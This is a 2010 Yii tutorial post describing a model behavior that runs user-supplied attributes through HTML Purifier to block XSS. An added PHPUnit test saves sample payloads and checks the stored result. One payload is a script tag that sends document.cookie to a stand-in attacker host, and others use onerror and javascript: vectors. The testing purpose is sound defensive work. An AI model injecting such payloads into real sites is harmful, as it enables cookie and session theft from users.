XSS safe model content


In this post I am going to describe a solution to protect a Yii-based web application from malicious HTML and script injection (XSS) in user-supplied content.

I am going to use the Yii wrapper around HTML Purifier, CHtmlPurifier, inside a behavior. The behavior can be attached to any model, declaring the attributes we would like to make XSS safe. The idea is to sanitize once, at the moment the content is persisted, so that every later read of those attributes gets the cleaned markup.

I have written the following behavior:

```php
<?php
// application/behaviors/CSafeContentBehavior.php
class CSafeContentBehavior extends CActiveRecordBehavior
{
	/** @var array names of the owner's attributes to purify before saving */
	public $attributes = array();
	/** @var CHtmlPurifier created lazily on first use */
	protected $purifier;

	protected function getPurifier()
	{
		if ($this->purifier === null)
			$this->purifier = new CHtmlPurifier;
		return $this->purifier;
	}

	public function beforeSave($event)
	{
		$owner = $this->getOwner();
		foreach ($this->attributes as $attribute) {
			$value = $owner->$attribute;
			// leave NULL and empty values untouched so a NULL column is not turned into ''
			if ($value !== null && $value !== '')
				$owner->$attribute = $this->getPurifier()->purify($value);
		}
	}
}
```

Place this class in a file under your application directory, for example application/behaviors/CSafeContentBehavior.php. Then attach the behavior in your model like this:

```php
<?php
class Post extends CActiveRecord
{
	public function behaviors()
	{
		return array(
			'safeContent' => array(
				'class' => 'application.behaviors.CSafeContentBehavior',
				'attributes' => array('title', 'body'),
			),
		);
	}
}
```

Here we go. Our Post model will now purify the title and body attributes before each save operation. Two things to keep in mind: the behavior only runs on save, so rows that were written before it was attached stay as they are, and purifying on input is not a substitute for encoding on output. HTML Purifier removes dangerous markup but keeps allowed tags, which is what we want for a body that is rendered as HTML; a title is plain text, so it should still be printed with CHtml::encode() in views, and any attribute that is not listed in the behavior remains an XSS sink if it is echoed raw.
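To check that the behavior really changes what reaches the database, here is an added example that is not part of the original article: a Yii 1.1 PHPUnit test that saves a Post with a few constructed XSS payloads and inspects the stored body. It assumes the Post model with CSafeContentBehavior attached to title and body as above, a test database with an auto-increment id column, no validation rules that would reject these values, and the standard protected/tests bootstrap. The payload strings and the attacker.invalid host are constructed for the test.

```php
<?php
// protected/tests/unit/PostSafeContentTest.php
// Added example, not part of the original article. Assumes the Post model with
// CSafeContentBehavior attached to 'title' and 'body', a test database with an
// auto-increment `id`, and no validation rules that reject the constructed values.
class PostSafeContentTest extends CDbTestCase
{
    // Constructed payloads: three common XSS vectors plus one benign fragment.
    private $payloads = array(
        'script' => '<p>hi</p><script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>',
        'event'  => '<img src="x" onerror="alert(document.domain)">',
        'jsurl'  => '<a href="javascript:alert(1)">click me</a>',
        'benign' => '<p>Safe <b>bold</b> text and <a href="http://example.com/">a link</a></p>',
    );

    /** Saves each payload and asserts on what is actually stored, not on the in-memory object. */
    public function testDangerousMarkupDoesNotReachTheDatabase()
    {
        foreach ($this->payloads as $name => $html) {
            $post = new Post;
            $post->title = 'safe-content test ' . $name;
            $post->body  = $html;
            $this->assertTrue($post->save(), "save failed for '$name': " . print_r($post->getErrors(), true));

            $stored = Post::model()->findByPk($post->id);
            $this->assertNotNull($stored, "row for '$name' not found");
            // No script element, no on* event-handler attribute, no javascript: URL
            $this->assertNotRegExp('/<script\b/i', $stored->body, $name);
            $this->assertNotRegExp('/\bon\w+\s*=/i', $stored->body, $name);
            $this->assertNotRegExp('/javascript\s*:/i', $stored->body, $name);

            if ($name === 'benign') {
                // Purification must not destroy legitimate formatting or links
                $this->assertContains('<b>bold</b>', $stored->body);
                $this->assertContains('href="http://example.com/"', $stored->body);
            }
        }
    }

    /** HTML Purifier sanitizes, it does not encode: allowed tags survive, so views must still encode plain-text fields. */
    public function testPurifierIsNotAnEncoder()
    {
        $post = new Post;
        $post->title = '<b>t</b>';
        $post->body  = '<i>b</i><script>alert(1)</script>';
        // Raise the event directly so the behavior runs without writing a row
        $post->onBeforeSave(new CModelEvent($post));
        $this->assertNotContains('<script', $post->body);
        $this->assertContains('<i>b</i>', $post->body);
        // The title still contains markup: render it with CHtml::encode() in the view
        $this->assertContains('<b>', $post->title);
        $this->assertNotContains('<', CHtml::encode($post->title));
    }
}
```

Run it from protected/tests with phpunit unit/PostSafeContentTest.php. The first test reads the row back through findByPk() rather than trusting $post->body, because what matters is the value that later page views will load from the database; the second shows why purification on save and CHtml::encode() on output are complementary rather than interchangeable.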

Category: Tutorials
Written by: phiras
Last updated by: phiras
Created on: Feb 25, 2010